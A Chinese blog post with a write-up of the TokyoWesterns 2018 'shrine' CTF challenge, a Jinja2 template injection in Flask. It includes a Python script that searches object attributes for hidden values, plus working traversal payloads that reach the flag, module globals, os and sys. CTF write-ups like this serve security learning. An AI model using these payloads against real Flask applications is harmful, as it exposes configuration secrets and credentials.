<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="google-site-verification" content="uA2LBPduURBuZGtOxH8gqs2DqL7Nw4ApMxyaAyc0lRo" />
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="ctf,writeup,格式化字符串," />










<meta name="description" content="前言周末花了一点点时间看TokyoWesterns，真正的web题只有两道。 非常遗憾没有做出这道shrine来。 搜索和思考过程了解了不少东西，但后来证明是思路进入了误区。 在此记录下思考过程。 不感兴趣可以直接看后面的writeup。 思考过程初见题目便直接给出源码12345678910111213141516171819202122# view-source:http://shrine.ch">
<meta name="keywords" content="ctf,writeup,格式化字符串">
<meta property="og:type" content="article">
<meta property="og:title" content="TokyoWesterns 2018 shrine writeup">
<meta property="og:url" content="https://eviloh.github.io/2018/09/03/TokyoWesterns-2018-shrine-writeup/index.html">
<meta property="og:site_name" content="eviloH&#39;s space">
<meta property="og:description" content="前言周末花了一点点时间看TokyoWesterns，真正的web题只有两道。 非常遗憾没有做出这道shrine来。 搜索和思考过程了解了不少东西，但后来证明是思路进入了误区。 在此记录下思考过程。 不感兴趣可以直接看后面的writeup。 思考过程初见题目便直接给出源码12345678910111213141516171819202122# view-source:http://shrine.ch">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2018-09-03T14:13:20.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="TokyoWesterns 2018 shrine writeup">
<meta name="twitter:description" content="前言周末花了一点点时间看TokyoWesterns，真正的web题只有两道。 非常遗憾没有做出这道shrine来。 搜索和思考过程了解了不少东西，但后来证明是思路进入了误区。 在此记录下思考过程。 不感兴趣可以直接看后面的writeup。 思考过程初见题目便直接给出源码12345678910111213141516171819202122# view-source:http://shrine.ch">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://eviloh.github.io/2018/09/03/TokyoWesterns-2018-shrine-writeup/"/>





  <title>TokyoWesterns 2018 shrine writeup | eviloH's space</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">eviloH's space</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">想写就写</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://eviloh.github.io/2018/09/03/TokyoWesterns-2018-shrine-writeup/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="eviloH">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/zy.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="eviloH's space">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">TokyoWesterns 2018 shrine writeup</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-09-03T20:12:35+08:00">
                2018-09-03
              </time>
            

            

            
          </span>

          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2018/09/03/TokyoWesterns-2018-shrine-writeup/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count gitment-comments-count" data-xid="/2018/09/03/TokyoWesterns-2018-shrine-writeup/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          
          
             <span id="/2018/09/03/TokyoWesterns-2018-shrine-writeup/" class="leancloud_visitors" data-flag-title="TokyoWesterns 2018 shrine writeup">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>周末花了一点点时间看TokyoWesterns，真正的web题只有两道。 非常遗憾没有做出这道shrine来。 搜索和思考过程了解了不少东西，但后来证明是思路进入了误区。 在此记录下思考过程。 不感兴趣可以直接看后面的writeup。</p>
<h1 id="思考过程"><a href="#思考过程" class="headerlink" title="思考过程"></a>思考过程</h1><p>初见题目便直接给出源码<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># view-source:http://shrine.chal.ctf.westerns.tokyo/</span></span><br><span class="line"><span class="keyword">import</span> flask</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">app = flask.Flask(__name__)</span><br><span class="line">app.config[<span class="string">'FLAG'</span>] = os.environ.pop(<span class="string">'FLAG'</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/')</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">index</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="keyword">return</span> open(__file__).read()</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/shrine/&lt;path:shrine&gt;')</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">shrine</span><span class="params">(shrine)</span>:</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">safe_jinja</span><span class="params">(s)</span>:</span></span><br><span class="line">        s = s.replace(<span class="string">'('</span>, <span class="string">''</span>).replace(<span class="string">')'</span>, <span class="string">''</span>)</span><br><span class="line">        blacklist = [<span class="string">'config'</span>, <span class="string">'self'</span>]</span><br><span class="line">        <span class="keyword">return</span> <span class="string">''</span>.join([<span class="string">'&#123;&#123;% set &#123;&#125;=None%&#125;&#125;'</span>.format(c) <span class="keyword">for</span> c <span class="keyword">in</span> blacklist])+s</span><br><span class="line">    <span class="keyword">return</span> flask.render_template_string(safe_jinja(shrine))</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    app.run(debug=<span class="keyword">True</span>)</span><br></pre></td></tr></table></figure></p>
<p>非常简单的一个flask应用，关键点在于shrine路由中的两个限制条件：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">s = s.replace(<span class="string">'('</span>, <span class="string">''</span>).replace(<span class="string">')'</span>, <span class="string">''</span>)</span><br></pre></td></tr></table></figure></p>
<p>过滤了括号，<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">''</span>.join([<span class="string">'&#123;&#123;% set &#123;&#125;=None%&#125;&#125;'</span>.format(c) <span class="keyword">for</span> c <span class="keyword">in</span> blacklist])+s</span><br></pre></td></tr></table></figure></p>
<p>在返回的模板前面加入了黑名单处理。 整理起来逻辑便是这样：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;% set config=<span class="keyword">None</span> %&#125;</span><br><span class="line">&#123;% set self=<span class="keyword">None</span> %&#125;</span><br><span class="line"><span class="string">"不带括号的输出"</span></span><br></pre></td></tr></table></figure></p>
<p>flask的app.config会直接以config变量传入jinja中，如果不加后面这个限制条件，那么直接用jinja里的config变量就可以输出结果了。</p>
<p>看到这题时思路有两个：</p>
<ol>
<li>绕过括号的过滤，直接使用SSTI的技巧读文件或getshell。</li>
</ol>
<p>这里找到了SSTI绕过过滤的两篇文章：</p>
<ul>
<li><a href="https://p0sec.net/index.php/archives/120/" target="_blank" rel="noopener">Flask/Jinja2模板注入中的一些绕过姿势</a></li>
<li><a href="https://0day.work/ictf-2017-flasking-unicorns-writeup-or-how-we-might-have-rooted-your-ictf-vm/#flaskingunicorns" target="_blank" rel="noopener">Jinja2 template injection filter bypasses</a></li>
</ul>
<p>这个思路研究了半天，发现这些技巧都是使用jinja的过滤器和传入的额外参数做文章。 我们使用传入额外参数，例如<a href="http://shrine.chal.ctf.westerns.tokyo/shrine/%7B%7Brequest.args.a%7D%7D?a=()" target="_blank" rel="noopener">http://shrine.chal.ctf.westerns.tokyo/shrine/%7B%7Brequest.args.a%7D%7D?a=()</a> ，确实能够让输出存在括号，但这种括号是以字符串形式存在的。 我又花了不少时间研究jinja默认过滤器中有没有能够执行字符串，然而以失败告终。 赛后想想如果真的存在这种过滤器，那么jinja模板注入也过于危险了。 最终这个思路行不通。</p>
<ol start="2">
<li>绕过set的限制</li>
</ol>
<p>类似于sql注入使用引号闭合前面的引号来构造新语句，我在想jinja是否存在一种语法能够开辟独立的命名空间，使得<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% set config=None %&#125;</span><br></pre></td></tr></table></figure></p>
<p>失效？ 带着这个想法，我开始阅读jinja中各种控制语句。 尝试用<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;% endset %&#125;</span><br><span class="line">&#123;% set ns = namespace() %&#125;</span><br></pre></td></tr></table></figure></p>
<p>这些语句来改变config的设置，最后以失败告终。</p>
<p>赛后想想，其实主要还是因为自己对jinja的feature不太熟悉，时间大多花在了错误的思路，导致没做出这道并不怎么难的题。</p>
<h1 id="writeup"><a href="#writeup" class="headerlink" title="writeup"></a>writeup</h1><p>正确的思路其实非常简单，既然不能使用括号调用函数，也不能用config直接引用app.config里的值，那么flag一定藏在jinja的其它变量的属性中，例如request。 那么我们深度搜索遍历这些变量，就一定能找出flag的访问路径。 我们自己实现一个flask应用，设置好app.config[‘FLAG’]，然后遍历request变量的所有值，直到找到我们设置好的flag为止。 参考<a href="https://ctftime.org/writeup/10851" target="_blank" rel="noopener">https://ctftime.org/writeup/10851</a>的搜索代码如下：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> flask</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> g</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> config</span><br><span class="line"></span><br><span class="line">app = flask.Flask(__name__)</span><br><span class="line">app.config[<span class="string">'FLAG'</span>] = <span class="string">'secret'</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">search</span><span class="params">(obj, max_depth)</span>:</span></span><br><span class="line">    visited_clss = []</span><br><span class="line">    visited_objs = []</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">visit</span><span class="params">(obj, path=<span class="string">'obj'</span>, depth=<span class="number">0</span>)</span>:</span></span><br><span class="line">        <span class="keyword">yield</span> path, obj</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> depth == max_depth:</span><br><span class="line">            <span class="keyword">return</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">elif</span> isinstance(obj, (int, float, bool, str, bytes)):</span><br><span class="line">            <span class="keyword">return</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">elif</span> isinstance(obj, type):</span><br><span class="line">            <span class="keyword">if</span> obj <span class="keyword">in</span> visited_clss:</span><br><span class="line">                <span class="keyword">return</span></span><br><span class="line">            visited_clss.append(obj)</span><br><span class="line">            print(obj)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="keyword">if</span> obj <span class="keyword">in</span> visited_objs:</span><br><span class="line">                <span class="keyword">return</span></span><br><span class="line">            visited_objs.append(obj)</span><br><span class="line"></span><br><span class="line">        <span class="comment"># attributes</span></span><br><span class="line">        <span class="keyword">for</span> name <span class="keyword">in</span> dir(obj):</span><br><span class="line">            <span class="keyword">if</span> name.startswith(<span class="string">'__'</span>) <span class="keyword">and</span> name.endswith(<span class="string">'__'</span>):</span><br><span class="line">                <span class="keyword">if</span> name <span class="keyword">not</span> <span class="keyword">in</span> (<span class="string">'__globals__'</span>, <span class="string">'__class__'</span>, <span class="string">'__self__'</span>,</span><br><span class="line">                                <span class="string">'__weakref__'</span>, <span class="string">'__objclass__'</span>, <span class="string">'__module__'</span>):</span><br><span class="line">                    <span class="keyword">continue</span></span><br><span class="line">            attr = getattr(obj, name)</span><br><span class="line">            <span class="keyword">yield</span> <span class="keyword">from</span> visit(attr, <span class="string">'&#123;&#125;.&#123;&#125;'</span>.format(path, name), depth + <span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">        <span class="comment"># dict values</span></span><br><span class="line">        <span class="keyword">if</span> hasattr(obj, <span class="string">'items'</span>) <span class="keyword">and</span> callable(obj.items):</span><br><span class="line">            <span class="keyword">try</span>:</span><br><span class="line">                <span class="keyword">for</span> k, v <span class="keyword">in</span> obj.items():</span><br><span class="line">                    <span class="keyword">yield</span> <span class="keyword">from</span> visit(v, <span class="string">'&#123;&#125;[&#123;&#125;]'</span>.format(path, repr(k)), depth)</span><br><span class="line">            <span class="keyword">except</span>:</span><br><span class="line">                <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line">        <span class="comment"># items</span></span><br><span class="line">        <span class="keyword">elif</span> isinstance(obj, (set, list, tuple, frozenset)):</span><br><span class="line">            <span class="keyword">for</span> i, v <span class="keyword">in</span> enumerate(obj):</span><br><span class="line">                <span class="keyword">yield</span> <span class="keyword">from</span> visit(v, <span class="string">'&#123;&#125;[&#123;&#125;]'</span>.format(path, repr(i)), depth)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">yield</span> <span class="keyword">from</span> visit(obj)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/')</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">index</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="keyword">return</span> open(__file__).read()</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/shrine/&lt;path:shrine&gt;')</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">shrine</span><span class="params">(shrine)</span>:</span></span><br><span class="line">    <span class="keyword">for</span> path, obj <span class="keyword">in</span> search(request, <span class="number">10</span>):</span><br><span class="line">        <span class="keyword">if</span> str(obj) == app.config[<span class="string">'FLAG'</span>]:</span><br><span class="line">            <span class="keyword">return</span> path</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    app.run(debug=<span class="keyword">True</span>)</span><br></pre></td></tr></table></figure></p>
<p>运行这个脚本并访问<a href="http://127.0.0.1:5000/shrine/123" target="_blank" rel="noopener">http://127.0.0.1:5000/shrine/123</a> ，等待一段搜索时间后，得到路径如下：<br><code>obj.application.__self__._get_data_for_json.__globals__[&#39;json&#39;].JSONEncoder.default.__globals__[&#39;current_app&#39;].config[&#39;FLAG&#39;]</code><br>访问<a href="http://shrine.chal.ctf.westerns.tokyo/shrine/" target="_blank" rel="noopener">http://shrine.chal.ctf.westerns.tokyo/shrine/</a>得到flag：<br><code>TWCTF{pray_f0r_sacred_jinja2}</code></p>
<h1 id="更多思考"><a href="#更多思考" class="headerlink" title="更多思考"></a>更多思考</h1><p>看到这道题的正确解法后非常惊讶，不通过这种方法，我无论如何也想不到在_get_data_for_json和JSONEncoder中居然能扩展到应用本身。 原本我的知识还局限在<a href="https://www.leavesongs.com/PENETRATION/python-string-format-vulnerability.html" target="_blank" rel="noopener">Python 格式化字符串漏洞（Django为例）</a>一文中使用特定的类的<strong>init</strong>方法去访问全局变量。 这样一来，不就有了各种各样的可能性？我马上做了几个补充实验：</p>
<ol>
<li>不在app.config，直接是全局变量能不能访问？</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">from</span> jinjia_search <span class="keyword">import</span> search</span><br><span class="line"></span><br><span class="line">glob = <span class="string">'global secret'</span></span><br><span class="line">app = flask.Flask(__name__)</span><br><span class="line">app.config[<span class="string">'FLAG'</span>] = <span class="string">'secret'</span></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/')</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">index</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="keyword">return</span> open(__file__).read()</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/shrine/&lt;path:shrine&gt;')</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">shrine</span><span class="params">(shrine)</span>:</span></span><br><span class="line">    <span class="keyword">for</span> path, obj <span class="keyword">in</span> search(request, <span class="number">10</span>):</span><br><span class="line">        <span class="keyword">if</span> str(obj) == glob:</span><br><span class="line">            <span class="keyword">return</span> path</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    app.run(debug=<span class="keyword">True</span>)</span><br></pre></td></tr></table></figure>
<p>毫无疑问答案是肯定的，以下路径就可以访问到：<br><code>obj.application.__self__._get_data_for_json.__globals__[&#39;json&#39;].JSONEncoder.default.__globals__[&#39;current_app&#39;].view_functions[&#39;index&#39;].__globals__[&#39;glob&#39;]</code></p>
<ol start="2">
<li>除了request，jinja的其它默认变量能不能访问到全局变量？</li>
</ol>
<p>经过测试，config, request, session, g都可以访问到：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">config:  obj.Config.from_envvar.__globals__[<span class="string">'json'</span>].JSONEncoder.default.__globals__[<span class="string">'current_app'</span>].view_functions[<span class="string">'index'</span>].__globals__[<span class="string">'glob'</span>]</span><br><span class="line">request: obj.application.__self__._get_data_for_json.__globals__[<span class="string">'json'</span>].JSONEncoder.default.__globals__[<span class="string">'current_app'</span>].view_functions[<span class="string">'index'</span>].__globals__[<span class="string">'glob'</span>]</span><br><span class="line">session: obj.__class__._get_current_object.__globals__[<span class="string">'__loader__'</span>].__class__.__weakref__.__objclass__.get_data.__globals__[<span class="string">'__loader__'</span>].exec_module.__globals__[<span class="string">'__builtins__'</span>][<span class="string">'__build_class__'</span>].__self__.copyright.__class__._Printer__setup.__globals__[<span class="string">'sys'</span>].modules[<span class="string">'__main__'</span>].app.view_functions[<span class="string">'index'</span>].__globals__[<span class="string">'glob'</span>]</span><br><span class="line">g: obj.__class__._get_current_object.__globals__[<span class="string">'__loader__'</span>].__class__.__weakref__.__objclass__.get_data.__globals__[<span class="string">'__loader__'</span>].exec_module.__globals__[<span class="string">'__builtins__'</span>][<span class="string">'__build_class__'</span>].__self__.copyright.__class__._Printer__setup.__globals__[<span class="string">'sys'</span>].modules[<span class="string">'__main__'</span>].app.view_functions[<span class="string">'index'</span>].__globals__[<span class="string">'glob'</span>]</span><br></pre></td></tr></table></figure></p>
<p>注意session和g都要设置更高的搜索深度才能找到变量。</p>
<ol start="3">
<li>其它类</li>
</ol>
<p>例如os, sys这些模块，当然也是可以的：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">os: obj.MutableMapping.__class__._dump_registry.__globals__[<span class="string">'__loader__'</span>].__class__.__weakref__.__objclass__.get_data.__globals__[<span class="string">'__loader__'</span>].exec_module.__globals__[<span class="string">'__builtins__'</span>][<span class="string">'__build_class__'</span>].__self__.copyright.__class__._Printer__setup.__globals__[<span class="string">'sys'</span>].modules[<span class="string">'__main__'</span>].glob</span><br><span class="line">sys: obj.modules[<span class="string">'__main__'</span>].app.view_functions[<span class="string">'index'</span>].__globals__[<span class="string">'glob'</span>]</span><br></pre></td></tr></table></figure></p>
<p>如果像<a href="https://www.leavesongs.com/PENETRATION/python-string-format-vulnerability.html" target="_blank" rel="noopener">Python 格式化字符串漏洞（Django为例）</a>中的例子一样，格式化字符串的参数是含有这些模块的任意类，我们就可以使用这种方法获取任意全局变量。</p>
<p>除了jinja，其它模板基本也都有这个问题。 这意味着只要存在模板注入，大部分情况下，我们都能获取到python全局变量中的任何信息。 这其中往往包括config.py, settings.py这些敏感信息。</p>
<h1 id="后话"><a href="#后话" class="headerlink" title="后话"></a>后话</h1><p>纵观正确的解法，其实并没有什么原先不知道的知识。 打CTF时还是太不自信，老想着各位师傅发现了什么新的绕过姿势或是奇特的注入技巧，而没有利用好自己最基本的知识。 同样是基本的漏洞知识，在大佬们手中都能玩出花来，这是我接下来要好好思考，培养的能力。</p>
<h1 id="参考文献"><a href="#参考文献" class="headerlink" title="参考文献"></a>参考文献</h1><ol>
<li><a href="https://ctftime.org/writeup/10851" target="_blank" rel="noopener">https://ctftime.org/writeup/10851</a></li>
<li><a href="https://www.leavesongs.com/PENETRATION/python-string-format-vulnerability.html" target="_blank" rel="noopener">Python 格式化字符串漏洞（Django为例）</a></li>
<li><a href="https://0day.work/ictf-2017-flasking-unicorns-writeup-or-how-we-might-have-rooted-your-ictf-vm/#flaskingunicorns" target="_blank" rel="noopener">Jinja2 template injection filter bypasses</a></li>
<li><a href="https://p0sec.net/index.php/archives/120/" target="_blank" rel="noopener">Flask/Jinja2模板注入中的一些绕过姿势</a></li>
</ol>

      
    </div>
    <div>    
 
 
    <ul class="post-copyright">
      <li class="post-copyright-author">
          <strong>本文作者：</strong>eviloH
      </li>
      <li class="post-copyright-link">
        <strong>本文链接：</strong>
        <a href="/2018/09/03/TokyoWesterns-2018-shrine-writeup/" title="TokyoWesterns 2018 shrine writeup">2018/09/03/TokyoWesterns-2018-shrine-writeup/</a>
      </li>
      <li class="post-copyright-license">
        <strong>版权声明： </strong>
        本博客所有文章除特别声明外，均采用 <a href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0 CN</a> 许可协议。转载请注明出处！
      </li>
    </ul>
  
</div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf/" rel="tag"># ctf</a>
          
            <a href="/tags/writeup/" rel="tag"># writeup</a>
          
            <a href="/tags/格式化字符串/" rel="tag"># 格式化字符串</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/08/08/pptr的一些缺陷和一个可靠的解决方案/" rel="next" title="pptr的一些缺陷和一个可靠的解决方案">
                <i class="fa fa-chevron-left"></i> pptr的一些缺陷和一个可靠的解决方案
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      
        <div id="gitment-container"></div>
      
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/zy.jpg"
                alt="eviloH" />
            
              <p class="site-author-name" itemprop="name">eviloH</p>
              <p class="site-description motion-element" itemprop="description">记录平淡的生活</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">标签</span>
                </a>
